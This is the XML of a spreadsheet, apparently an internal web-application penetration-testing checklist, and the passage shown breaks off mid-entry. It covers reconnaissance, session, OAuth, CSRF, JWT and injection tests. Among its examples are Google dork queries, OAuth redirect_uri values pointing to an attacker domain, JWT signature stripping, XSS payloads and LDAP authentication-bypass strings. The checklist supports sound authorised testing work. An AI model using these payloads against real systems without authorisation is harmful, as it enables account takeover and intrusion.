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https://d.docs.live.net/d2e2bce1d62e1d7f/Desktop/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="204" documentId="13_ncr:1_{E4F507E5-80FA-4249-B153-D79A50879269}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{2D7D771D-28BE-4098-AE62-E4F7CE355C71}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="12456" tabRatio="457" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="New Strategy" sheetId="2" r:id="rId1"/>
    <sheet name="Network_strategy_for_web" sheetId="5" r:id="rId2"/>
    <sheet name="SQL-vectors" sheetId="4" r:id="rId3"/>
    <sheet name="Google Dork - commands" sheetId="6" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName name="__Anonymous_Sheet_DB__1">#REF!</definedName>
    <definedName name="__Anonymous_Sheet_DB__1_1">'New Strategy'!$B:$B</definedName>
    <definedName name="Excel_BuiltIn__FilterDatabase" localSheetId="0">'New Strategy'!$B:$B</definedName>
    <definedName name="Excel_BuiltIn__FilterDatabase_1">'New Strategy'!$B:$B</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ADMINIBM</author>
  </authors>
  <commentList>
    <comment ref="E3" authorId="0" shapeId="0" xr:uid="{00000000-0006-0000-0000-000001000000}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>ADMINIBM:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Please provide useful comments/observations against the test case that aid in providing further insight into pen testing the target application</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="599" uniqueCount="575">
  <si>
    <t>Use Comments / Observations column against the test case to provide meaningful information for positive (mention RTC defectId) and negative results (include artifacts / links to saved evidences in RTC) to best possible extent. 
For multiple applications, fill in comments for all applications as a bulleted list</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Sub-category</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>Comments / Observations**</t>
  </si>
  <si>
    <t>Scenario ID</t>
  </si>
  <si>
    <t>Test Scenarios</t>
  </si>
  <si>
    <t>Tools to Use</t>
  </si>
  <si>
    <t>Conditions</t>
  </si>
  <si>
    <t>References</t>
  </si>
  <si>
    <t>Pre-Scan Analysis</t>
  </si>
  <si>
    <t>Test if target is stable</t>
  </si>
  <si>
    <t>PTC-PEN-PSID-0001</t>
  </si>
  <si>
    <t>Understand target OS/Server/Framework/Technology/etc.</t>
  </si>
  <si>
    <t>PTC-PEN-PSID-0002</t>
  </si>
  <si>
    <t>Wappalyzer, WhatRuns plugin for firefox and chrome</t>
  </si>
  <si>
    <t xml:space="preserve">Search for multi-step functionality </t>
  </si>
  <si>
    <t>PTC-PEN-PSID-0003</t>
  </si>
  <si>
    <t>Search for non-automatable components (CAPTCHA/OTP/etc)</t>
  </si>
  <si>
    <t>PTC-PEN-PSID-0004</t>
  </si>
  <si>
    <t>Search for time/trigger dependent functionality</t>
  </si>
  <si>
    <t>PTC-PEN-PSID-0005</t>
  </si>
  <si>
    <t>Identify input locations to construct custom parameters</t>
  </si>
  <si>
    <t>PTC-PEN-PSID-0006</t>
  </si>
  <si>
    <t>Test response time to set delays</t>
  </si>
  <si>
    <t>PTC-PEN-PSID-0007</t>
  </si>
  <si>
    <t>Scan</t>
  </si>
  <si>
    <t>IBM AppScan</t>
  </si>
  <si>
    <t>PTC-PEN-SCID-0001</t>
  </si>
  <si>
    <t>Always choose "Complete policy" when network test is not in scope and "Default policy" when network test is in scope.
Follow best practices for configuring scans
    i. Use multi step feature and custom parameters/ regular expressions for getting the best out of scans
   ii. Test response time to set delays
   iii. Exclude login functionality and pages that are based on CAPTCHA/OTP etc from automated scans
   iv. Exclude application areas that consume resources (such as creating systems) or results in deletion of key resources etc from automated scans</t>
  </si>
  <si>
    <t>Use for full pen test strategy and in cases where Burp scan fails while running minimal pen test strategy</t>
  </si>
  <si>
    <t>BurpSuite Pro</t>
  </si>
  <si>
    <t>PTC-PEN-SCID-0002</t>
  </si>
  <si>
    <t>Add Burp extensions as suggested for extending the capability or to overcome limitations
Follow best practices for configuring scans
   i. Test response time to set delays
   ii. Exclude login functionality and pages that are based on CAPTCHA/OTP etc from automated scans
   iii. Exclude application areas that consume resources (such as creating systems) or results in deletion of key resources etc from automated scans
   iv. Make use of Macros and CookieJar whereever applicable.</t>
  </si>
  <si>
    <t>OWASP ZAP</t>
  </si>
  <si>
    <t>PTC-PEN-SCID-0003</t>
  </si>
  <si>
    <t>Follow best practices for configuring and running scans
   i. Test response time to set delays
   ii. Exclude login functionality and pages that are based on CAPTCHA/OTP etc from automated scans
   iii. Exclude application areas that consume resources (such as creating systems) or results in deletion of key resources etc from automated scans</t>
  </si>
  <si>
    <t>AppScan or Burp fails to scan certain application / feature</t>
  </si>
  <si>
    <t>Scan Report Analysis</t>
  </si>
  <si>
    <t>PTC-PEN-RAID-0001</t>
  </si>
  <si>
    <t>WebApp - Information Gathering</t>
  </si>
  <si>
    <t>Search Engine discovery</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0001</t>
  </si>
  <si>
    <t>Find publicly disclosed information of target. Use Google hacking tricks. ()
Search in Google:
Site:example.com
Site:example.com password
Site:example filetype:cgi
Site:example inurl:backup
Gather information from following sites:
Pipl.com
http://www.netcraft.com/</t>
  </si>
  <si>
    <t>Third party integration validation</t>
  </si>
  <si>
    <t xml:space="preserve">1. Identify subdomains via CNAME and to do so dig tool can be used
2. Google Dorking for subdomain enumeration using
site: *.&lt;domain_name&gt;&lt;tld&gt; and intext:"login" and inurl: &lt;path&gt; and intext: "Powered By"
intext: "Trusted By"
3. Check for Reverse CNAME lookup </t>
  </si>
  <si>
    <t>Shodan, Censys, Spyse, amass, subfinder</t>
  </si>
  <si>
    <t>Gather Info from - Response Headers</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0002</t>
  </si>
  <si>
    <t>For Burp, use "Headers Analyzer" extension</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/List_of_HTTP_header_fields
https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
https://www.w3.org/Protocols/rfc2616/rfc2616-sec6.html
http://www.tutorialspoint.com/http/http_responses.htm
http://www.tutorialspoint.com/http/http_header_fields.htm
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers
https://www.whitehatsec.com/blog/list-of-http-response-headers/
https://cloud.google.com/storage/docs/xml-api/reference-headers
https://developer.github.com/v3/
http://www.freeformatter.com/mime-types-list.html
HTTP Header Tool: http://www.tomanthony.co.uk/tools/bulk-http-header-compare/</t>
  </si>
  <si>
    <t>Gather Info from – Meta-tags</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0003</t>
  </si>
  <si>
    <t>Observe &lt;meta&gt; tag of each page for any disclosed information about server framework, technology, components, etc.</t>
  </si>
  <si>
    <t>Gather Info from – Comments</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0004</t>
  </si>
  <si>
    <t>Observe HTML comments &lt;!-- → for any sensitive information like backup passwords, admin components, email addresses, etc.</t>
  </si>
  <si>
    <t>Gather Info from - Cookie names</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0005</t>
  </si>
  <si>
    <t>Observe the cookie names, default cookie name discloses the frameworks/language used by server.
JSESSIONID – Java
ASP.Net_SessionID - .NET Framework
PHPSESSID – PHP</t>
  </si>
  <si>
    <t>Gather Info from – File extensions</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0006</t>
  </si>
  <si>
    <t>Observe file extensions to identify target frameworks
Java: .jsp, .jsf, etc.
.NET: .asp, .aspx, etc.
PHP: .php, .php5, etc</t>
  </si>
  <si>
    <t>Gather Info from – Webserver metafiles</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0007</t>
  </si>
  <si>
    <t>Try to get these files in target server and gather information from them:
/robots.txt
/crossdomain.xml
Find appropriate fuzzing list from predictable-path**(Attached Along or In Connections, PTC-PEN-IGID-0007.zip)</t>
  </si>
  <si>
    <t>Gather Info from - Default Errors/Error Page</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0008</t>
  </si>
  <si>
    <t>Observe default 4XX/5XX error pages and identify the target technology. Refer PTC-PEN-IGID-0008.rtf</t>
  </si>
  <si>
    <t>Gather Info from - Endpoint Leaks</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0011</t>
  </si>
  <si>
    <t>Observe each and every response body of background triggered "GET" requests for endpoint leaks like Tokens, ID's, keys, configuration details and other sensitive info, which are used for connecting to external/3rd party services ie., Github, Box, Slack, S3 etc.,</t>
  </si>
  <si>
    <t>Burp Extender /  Burp or Appscan Intercepted / Crawled Data.</t>
  </si>
  <si>
    <t>Gather Info from - External Scripts and CSS</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0009</t>
  </si>
  <si>
    <t>Identify any external Script and CSS used by application (find all &lt;script&gt; and &lt;link&gt; tag) and findout the known vulnerabilities in those.
Example Scripts:
JQuery, Google Analytic, Backbone, Dojo, Underscore, etc.</t>
  </si>
  <si>
    <t>Identify application entry points</t>
  </si>
  <si>
    <t>PTC-PEN-IGID-0010</t>
  </si>
  <si>
    <t>Identify all possible entry to application for using same in future tests. Possible entrypoints:
Direct Login
Mobile Login
Admin Login
Balance/Status checks (Without login maybe)
(Use these entry points in tests for bypassing authentication)</t>
  </si>
  <si>
    <t>WebApp – Configuration Issues</t>
  </si>
  <si>
    <t>Transport Layer Security</t>
  </si>
  <si>
    <t>PTC-PEN-CIID-0001</t>
  </si>
  <si>
    <t>Application Platform Configuration (based on gathered info)</t>
  </si>
  <si>
    <t>PTC-PEN-CIID-0002</t>
  </si>
  <si>
    <t>For the versions of software (such as DB, Webserver etc) deployed in the server, check For known vulnerabilities For those versions in sites such as National Vulnerability Database (NVD), Exploit-db.
• Check whether the actual deployed versions of software matches with the version gathered with fingerpriting and banner grabbing techniques.
• Check whether the server has any out-of-support or out-of-date versions deployed.
• Check whether any of the installed software interfaces has default username/password.</t>
  </si>
  <si>
    <t>Server configuration (based on gathered info)</t>
  </si>
  <si>
    <t>PTC-PEN-CIID-0003</t>
  </si>
  <si>
    <t>Check for presence of sensitive information (stack traces, debug information, email addresses, username/password, IP addresses, business data) in responses
• Check for presence of Server header with server version information
• Check for presence of well known files and folders (such as /robot.txt, /images, /uploads etc) using tools such as Burp Suite</t>
  </si>
  <si>
    <t>Old files/Backup files/unused files for sensitive info</t>
  </si>
  <si>
    <t>PTC-PEN-CIID-0004</t>
  </si>
  <si>
    <t xml:space="preserve"> Check for presence of old or backup files such as files containing name "old", "bck", "backup".</t>
  </si>
  <si>
    <t>HTTP Methods</t>
  </si>
  <si>
    <t>PTC-PEN-CIID-0005</t>
  </si>
  <si>
    <t>Check which methods are processed by the application in the "Allow" header in the response.
• Modify the request method to different methods such as TRACE, UPDATE, DELETE, OPTIONS etc which are not allowed by the server. The response to this request must be "405 Method Not Allowed" or "501 Method Unimplemented". If it responds with 200 response, then it is a vulnerability.
• Check if the server responds to HEAD method with 200 OK response.</t>
  </si>
  <si>
    <t>HSTS</t>
  </si>
  <si>
    <t>PTC-PEN-CIID-0006</t>
  </si>
  <si>
    <t>Check for presence of HSTS header "Strict-Transport-Security" in the responses.</t>
  </si>
  <si>
    <t>Host Header Injection</t>
  </si>
  <si>
    <t>PTC-PEN-CIID-0008</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Password Reset Poisoning</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> : If the web application makes use of the host header value when composing the reset link, an attacker can poison the password reset link that is sent to a victim with the domain he controls. If the victim clicks on the poisoned reset link in the email, the attacker will obtain the password reset token and can go ahead and reset the victim’s password. 
2) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Web cache Poisoning using X-Forwarded-Host Header</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> : If the application is properly validating host header value, add X-Forwarded-Host header in request and set its value to attacker controlled domain. If it is supported and no security checks are in place, then the user will be redirected to the domain set using X-Forwarded-Host header .</t>
    </r>
  </si>
  <si>
    <t>Burp</t>
  </si>
  <si>
    <t>http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html</t>
  </si>
  <si>
    <t>Web-Frameworks Vulnerabilities</t>
  </si>
  <si>
    <t>PTC-PEN-CIID-0009</t>
  </si>
  <si>
    <t>Burp Extensions - Software Version Reporter  &amp; Software Vulnerability Scanner</t>
  </si>
  <si>
    <t>WebApp – Authentication</t>
  </si>
  <si>
    <t>Default Credentials</t>
  </si>
  <si>
    <t>PTC-PEN-ACID-0001</t>
  </si>
  <si>
    <t xml:space="preserve">Are default username and passwords allowed?                          </t>
  </si>
  <si>
    <t>Account enumeration</t>
  </si>
  <si>
    <t>PTC-PEN-ACID-0002</t>
  </si>
  <si>
    <t>Username/Password policy</t>
  </si>
  <si>
    <t>PTC-PEN-ACID-0003</t>
  </si>
  <si>
    <t>• Are weak / blank passwords disallowed?
• Check whether the password policy is enforced on the Forgot Password page as well.
• Check whether password complexity is enforced
• Check whether a password with less than 8 characters is accepted by the application.
• Check whether the application accepts a fully alphabetic password, a fully numeric password or a password without special characters.
• Check whether the user can reset his/her password to any of the previous 3 passwords</t>
  </si>
  <si>
    <t>Lockout Mechanism/remediation against bruteforce</t>
  </si>
  <si>
    <t>PTC-PEN-ACID-0004</t>
  </si>
  <si>
    <t>Test for password change/reset/Security Questions vulnerabilities</t>
  </si>
  <si>
    <t>PTC-PEN-ACID-0006</t>
  </si>
  <si>
    <t>Check whether the current password works or not after initiating the forgot password action. If just by providing the email address or username (i.e without any secret) in forgot password feature if the old password becomes unusable then this flaw can be used to perform a DoS attack.</t>
  </si>
  <si>
    <t>OAUTH
1. Insufficient URI Validation
2. Missing or Insecure State Parameter
3. Improper implementation of the implicit grant type
4. Improper scope validation
5. Reusable Authorization Codes
6. Sensitive information Disclosure</t>
  </si>
  <si>
    <t xml:space="preserve">Insufficient URI Validation:
1. Intercept the request in OAuth flow containing the 'redirect_uri' URL parameter and replace it with the malicious domain.
2. If the 'redirect_uri' URL parameter is getting verified with the provided whitelist, append extra values to the default 'redirect_uri' parameter.
  https://default-host.com &amp;@foo.evil-user.net#@bar.evil-user.net/
3. Try submitting duplicate 'redirect_uri' parameters as follows
   https://oauth-authorization-server.com/?client_id=123&amp;redirect_uri=client-app.com/callback&amp;redirect_uri=evil-user.net
4. If applicable, try to change the response_mode from 'query' to 'fragment' (which can sometimes completely alter the parsing of the 'redirect_uri') and alter the 'redirect_uri'.
Missing or Insecure State Parameter:
1. Check whether 'state' parameter is in use or not (This acts like a CSRF token lack of which leads to CSRF kind of attacks).
2. verifying that the State variable has sufficient entropy and is not otherwise predictable. 
3. Check whether the state variable is reusable. In other words, verify that the State variable has been changed between requests. (If the State variable is reused across multiple requests, there is a larger impact of the state variable being compromised as it may still be valid for future sessions)
4. Check whether 'state' parameter is validated properly (editing the value or removing that parameter). Some times editing the state parameter may result an error, but if we completely remove that parameter, it may work.
Improper implementation of the implicit grant type:
1. If implicit grant type is used, check whether the client application is verifying that the access token matches the other data in the request.
2. If implicit grant type is not used, then try to convert the 'authorization code grant' to an 'implicit grant' by modifying the 'response_type' value passed as a URL parameter by setting it equal to: “token” (which skips the stage involving an authorization Code and immediately returns an Access Token).
Initial request:
GET /authorization?client_id=12345&amp;redirect_uri=https://client-app.com/callback&amp;response_type=code&amp;scope=openid%20profile&amp;state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com
Changed request:
GET /authorization?client_id=12345&amp;redirect_uri=https://client-app.com/callback&amp;response_type=token&amp;scope=openid%20profile&amp;state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com
Improper scope validation:
1. Check whether the 'scope' parameter value is verified properly before and after generation of 'autorization code'.
Example: The malicious client application initially requested access to the user's email address using the 'openid email' scope.
After the user approves this request, the malicious client application receives an authorization code.
After that, add another scope parameter to the code/token exchange request containing the additional 'profile' scope like below.
GET /authorization?client_id=12345&amp;redirect_uri=https://client-app.com/callback&amp;response_type=code&amp;scope=openid%20email&amp;state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com
Now, add additional scope value to fetch te access token.
POST /token
Host: oauth-authorization-server.com
…
client_id=12345&amp;client_secret=SECRET&amp;redirect_uri=https://client-app.com/callback&amp;grant_type=authorization_code&amp;code=a1b2c3d4e5f6g7h8&amp;scope=openid%20 email%20profile
2. If the server does not validate this against the scope from the initial authorization request, it will sometimes generate an access token using the new scope and send this to the client application.
Reusable Authorization Codes:
Check to see if a client-application will let a user redeem the same authorization code multiple times.
Each code should only be good for a single OAuth session, reusing a code that has already been redeemed should result in an error.
1. Perform the OAuth process multiple times and check whether authorization code is different each time.
2. Replace the authorization code value with the old value and check whether it is accepted or not.
Sensitive information Disclosure:
1. At any point in testing check if you see the Client Secret and raw access token.
2. Check if the access token/code/state is stored in the browser history.
3. After the redirect to the client-application, check whether the code and state parameters are included in the Referer header URL. </t>
  </si>
  <si>
    <t>BurpSuite</t>
  </si>
  <si>
    <t xml:space="preserve">
https://oauth.net/2/
https://portswigger.net/web-security/oauth
https://ibm.ent.box.com/folder/161364218377
</t>
  </si>
  <si>
    <t>Bypass authentication schema</t>
  </si>
  <si>
    <t>PTC-PEN-ACID-0007</t>
  </si>
  <si>
    <t>Sometimes there is authentication status value (e.g. loggedin=false) sent in the request / response. Manipulating them may result in completing successful authentication with incorrect userid/ password.</t>
  </si>
  <si>
    <t>WebApp – Authorization</t>
  </si>
  <si>
    <t>PTC-PEN-AZID-0001</t>
  </si>
  <si>
    <t>a) Input vectors enumeration : 
Check all parts of the application that accepts input from the user and question
    Are there request parameters which could be used for file-related operations?
    Are there unusual file extensions?
    Are there interesting variable names?
b) Testing technique
Perform the dot-dot-slash attack (../)  on these parameters to check if directory traversal is possible.</t>
  </si>
  <si>
    <t>PTC-PEN-AZID-0002</t>
  </si>
  <si>
    <t>Appscan /Burp</t>
  </si>
  <si>
    <t>Insecure Direct Object References</t>
  </si>
  <si>
    <t>PTC-PEN-AZID-0003</t>
  </si>
  <si>
    <t>WebApp - Session Management</t>
  </si>
  <si>
    <t>Session ID analysis/predict/manipulation</t>
  </si>
  <si>
    <t>PTC-PEN-SMID-0001</t>
  </si>
  <si>
    <t>Login to the application. Note down the session ID's, Logout and login again. 
Check to see if any pattern in Session ID is present.</t>
  </si>
  <si>
    <t>Use Burp Sequencer to of  live capture and analyze the session ID's</t>
  </si>
  <si>
    <t>Cookie Attribute</t>
  </si>
  <si>
    <t>PTC-PEN-SMID-0002</t>
  </si>
  <si>
    <t>For Web applications and session is managed with cookies</t>
  </si>
  <si>
    <t>Session Fixation</t>
  </si>
  <si>
    <t>PTC-PEN-SMID-0003</t>
  </si>
  <si>
    <t>• If theweb application authenticates a user without first invalidating the existing session ID?                                      
• Check if the session ID is issued first b4 login and then login is over HTTPS?</t>
  </si>
  <si>
    <t>When application has to be authenticated</t>
  </si>
  <si>
    <t>Exposed Session Variables</t>
  </si>
  <si>
    <t>PTC-PEN-SMID-0004</t>
  </si>
  <si>
    <t>Protocol used (e.g., HTTP vs. HTTPS)
• Is Session ID  different when there is transistion from HTTPS to HTTP(ex: Help, About )                                          
• Is Session ID cached?-Cache-Control: no-cache/“Expires: 0” and Cache-Control: max-age=0-- in all request and response passing Session ID 
• If Session Ids in GET request,
http://owaspapp.com/login.asp?Login=Username&amp;
password=Password&amp;SessionID=12345678
then POST method can be done using GET example request
POST http://owaspapp.com/login.asp HTTP/1.1Host: owaspapp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.0.2) Gecko/20030208 Netscape/7.02 Paros/3.0.2b
Accept: */*
Accept-Language: en-us, en
Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66
Keep-Alive: 300
Cookie: ASPSESSIONIDABCDEFG=ASKLJDLKJRELKHJG
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Login=Username&amp;password=Password&amp;SessionID=12345678            </t>
  </si>
  <si>
    <t>Cross Site request Forgery</t>
  </si>
  <si>
    <t>PTC-PEN-SMID-0005</t>
  </si>
  <si>
    <t>1.Analyse the HTML Code for legitimate parameters like session ID                     2.Build an html page containing the http request referencing URL  (specifying all relevant parameters; in the case of http GET this is straightforward, while to a POST request you need to resort to some Javascript);                                         3. Make sure that the valid user is logged on the application induce him into following the link pointing to the URL to be tested (social engineering involved if you cannot impersonate the user yourself);                                                           
4. Observe the result, i.e. check if the web server executed the request.</t>
  </si>
  <si>
    <t>Use BurpSuite CSRF PoC generator</t>
  </si>
  <si>
    <t>1. Application session management relying only on information which is known by the browser 
2. Existence of HTML tags whose presence cause immediate access like &lt;img&gt; tags
3.Web applications whose session information is entirely supplied by the browser are vulnerable too
4.DOES NOT include form based authentication</t>
  </si>
  <si>
    <t>Logout Function vulnerabilities</t>
  </si>
  <si>
    <t>PTC-PEN-SMID-0006</t>
  </si>
  <si>
    <t>1.Check if Logout/Sign Out/SignOff/any other logut button is available and clearly visible without scrolling on all pages 
2.Check if the session ID can be reused after logging out            
3. close the browser without logging out and check if the appllication prompts for login again or it simply uses the previous session ID to login 
4. Login. Note down the session ID's etc from cookie manger., traverse that needs user to be logged in -&gt; logout -&gt; press back button in browser, check if the page reloads w/o authentication—if yes, it is vulnerable.
5. Check if new session ID is generated after Logout. Not necessary though but a good practice.                                   
6. Check for session time out- try accessing page that require authentication after long delays interval(applicable only for sensitive applications) and check if cookies are destoryed from the browser (Note:Clearing the cookies from the browser is advisable, but is not strictly necessary, since if the session is properly invalidated on the server, having the cookie in the browser will not help an attacker.) 
7. Testing for session termination in single sign-on environments- Login to the application using single-sign on—logoff from the application. Check if there is single portal which allows you to login to the application w/o authentication. 8. Login to the application..but log off from SSO, check if you are able to traverse the appliction (expected result- logout from SSO/Application should present the user with SSO login again and then to application)            
8.  Check if Session timeout management and expiration is  enforced server-side. If on the client side like cookies. Manipulate the values like expiry date, log in time, etc and analyse the behaviour of the application                            </t>
  </si>
  <si>
    <t>Burp Suite – Repeater</t>
  </si>
  <si>
    <t>Session Timeout</t>
  </si>
  <si>
    <t>PTC-PEN-SMID-0007</t>
  </si>
  <si>
    <t>Session Token Analysis</t>
  </si>
  <si>
    <t>PTC-PEN-SMID-0008</t>
  </si>
  <si>
    <t>• If session IDs are in clear text/encrytped- try decoding using Base64/MD5 etc Ex: amUserInfo	UserName=anNtaXRo&amp;Password=ZGVtbzEyMzQ=
This decodes to jsmith and demo1234.                                      
• Which part of cookies is static—this could be IP Address/username/nodename (as in WAS7.x) then fuzz only the other part of the cookie--(may be it is based on time etc)      
• Obtain a single token from the application, and modify it in systematic ways to determine whether the entire token is validated or whether some of its subcomponents are ignored      
• If user registration is allowed try with different names with small variations like A, AA, AAA,-observer the session token if it is related to username.
• Check for sensitive token expiry on the client.</t>
  </si>
  <si>
    <t>use Burp's character frobber”
payload type in Burp Intruder to modify a token’s value in one character position at a time        
non-persistent: only RAM memory
• secure (set only on HTTPS channel):
Set Cookie: cookie=data; path=/; domain=.aaa.it; secure
• HTTPOnly (not readable by a script):
Set Cookie: cookie=data; path=/; domain=www.ibm.com HTTPOnly</t>
  </si>
  <si>
    <t>Java Web Token (JWT) Exploitation</t>
  </si>
  <si>
    <t>PTC-PEN-SMID-0009</t>
  </si>
  <si>
    <t>Decode JWT token to base64 and remove the signature. Encode the signature to base64 and submit new JWT token. 
If the application responds properly, it is vulnerable.</t>
  </si>
  <si>
    <t>Reference link: https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ https://www.owasp.org/index.php/JSON_Web_Token_(JWT)_Cheat_Sheet_for_Java#NONE_hashing_algorithm</t>
  </si>
  <si>
    <t>WebApp - Input Validation</t>
  </si>
  <si>
    <t>Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0001</t>
  </si>
  <si>
    <t>Use BurpSuite to analyze the raw response (In browser, EITHER reflecting values can be hidden from display OR HTML encoded response will be displayed with no encoding)</t>
  </si>
  <si>
    <t>Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0002</t>
  </si>
  <si>
    <t>1. For each request in testing identify the input parameters, which stores and responds back the value somewhere in same application
2. Identify set of characters which is not getting encoded in saved page (Sample Input: `';!--"&lt;XSS&gt;=&amp;{()})
3. Identify where input is getting reflected in response (Inside Script/CSS, Inside Value of input tag, Inside comments, Plain HTML, etc.)
4. Construct the payload script using non-encoded characters in response with respect to its place in response.
(Ex: If value is inside input tag value, the payload would be something like: “&gt;&lt;script&gt;alert(1)&lt;/script&gt;
Or if its inside application script and &gt;&lt; are encoded, then: '; alert(1); // )</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">some examples where stored XSS is possible are                                </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color indexed="21"/>
        <rFont val="Titillium-Bold"/>
      </rPr>
      <t>User/Profiles page 
Shopping cart 
File Manager  Forum/Message board 
Log</t>
    </r>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0003</t>
  </si>
  <si>
    <t>Add the vectors to Burp and fuzz the required parameters</t>
  </si>
  <si>
    <t>Parameter Pollution</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0004</t>
  </si>
  <si>
    <t xml:space="preserve">To test for HPP vulnerabilities, identify any form or action that allows user-supplied input. Query string parameters in HTTP GET requests are easy to tweak in the navigation bar of the browser. If the form action submits data via POST, the tester will need to use an intercepting proxy to tamper with the POST data as it is sent to the server. Having identified a particular input parameter to test, one can edit the GET or POST data by intercepting the request, or change the query string after the response page loads. To test for HPP vulnerabilities simply append the same parameter to the GET or POST data but with a different value assigned.
For example: if testing the search_string parameter in the query string, the request URL would include that parameter name and value. 
http://example.com/?mode=guest&amp;search_string=kittens&amp;num_results=100 
Append the same parameter with a different value 
http://example.com/?mode=guest&amp;search_string=kittens&amp;num_results=100&amp;search_string=puppies 
and submit the new request.
Analyze the response page to determine which value(s) were parsed. In the above example, the search results may show kittens, puppies, some combination of both (kittens,puppies or kittens~puppies or ['kittens','puppies']), may give an empty result, or error page. </t>
  </si>
  <si>
    <t>LDAP Injection</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0005</t>
  </si>
  <si>
    <r>
      <t>If a web application uses LDAP to check user credentials during the login process and it is vulnerable to LDAP injection, it is possible to bypass the authentication check by injecting an always true LDAP query (in a similar way to SQL and XPATH injection ).
Payloads:</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&amp;
(
)
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
/
//
//*
@*
x' or name()='username' or 'x'='y
|
*()|&amp;'
admin*
admin*)((|userpassword=*)
*)(uid=*))(|(uid=*</t>
    </r>
  </si>
  <si>
    <t>XML Injection</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0006</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Observe if any request is using XML type communication in application. And try below scenarios to inject into XML requests to Detect injection.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>XML Meta-characters:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Single quote: '</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - When not sanitized, this character could throw an exception during XML parsing, if the injected value is going to be part of an attribute value in a tag.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Double quote: "</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - this character has the same meaning as single quote and it could be used if the attribute value is enclosed in double quotes.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Angular parentheses: &gt; and &lt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
